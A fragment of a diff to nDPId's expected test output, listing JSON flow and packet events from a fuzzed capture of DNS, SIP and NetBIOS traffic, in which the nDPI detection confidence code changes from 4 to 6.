00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1120470037178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470037178,"pkt":"ADBUADRWAODtAW69CABFAABIamsAAIARTObAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1120470041184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470041184,"pkt":"ADBUADRWAKDtAW69CABFAABIamwAAIARTOXAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469847979,"flow_last_seen":1120469856989,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470041184,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1120470049185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470049185,"pkt":"ADBUAEFWAODtAW69CABFAABEam0AAIARTOjAqAECQ6gBAQq7ADUAMDM+8cUAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1120470049187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470049187,"pkt":"AODtJXMAADBUAG9WCABFAABbAABAAEARnD7AqAEBwKgBAgA1CrsARxW68cWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049188,"pkt":"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"} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1120470049190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470049190,"pkt":"ADBUADRWAODtAW69CABFAABIam8AAIARTOLAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049696,"flow_last_seen":1120470049696,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049696,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1120470049696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049696,"pkt":"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"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1120470050187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470050187,"pkt":"ADBUADRWAODtAW69CABFAABIanEAAFgRTODAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAB0AAE="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049190,"flow_last_seen":1120470050187,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470050187,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":116,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1120470050699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470050699,"pkt":"ADBUADRWAODtAdO9CABFAANSanIAAIARyujAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFmY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5W6FRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQm9udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTMyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllF2SBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDA0DQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470049696,"flow_last_seen":1120470050699,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470050699,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 01246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1120470051405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":637,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":637,"pkt_l4_len":603,"thread_ts_msec":1120470051405,"pkt":"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"} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1120470052189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470052189,"pkt":"ADBUADRWAODtAW69CABFAABIanMAAIARTN7AqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": 
{"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470049190,"flow_last_seen":1120470052189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470052189,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 